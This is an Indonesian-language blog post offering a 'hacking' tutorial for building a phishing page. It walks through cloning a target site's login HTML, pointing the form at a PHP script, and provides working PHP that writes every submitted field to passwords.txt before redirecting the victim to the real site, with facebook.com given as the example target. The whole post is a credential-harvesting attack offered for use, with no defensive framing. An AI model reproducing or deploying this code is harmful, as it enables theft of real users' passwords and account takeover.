Tutor PHISING

hmmmm...guyss..
ni tutor hacking yang sederhana
lets check....













1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:


--------------------------------------------------------------------------





--------------------------------------------------------------------------
4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"
Code:


----------------------------------------------------------------------------------------
header("Location: http://RANDOM.COM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


---------------------------------------------------------------------------------------
7. ganti tulisan yg http://RANDOM.COM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama.


jangan lupe chmod 777 di file password.txt

0 comments:

Posting Komentar

CHATBOX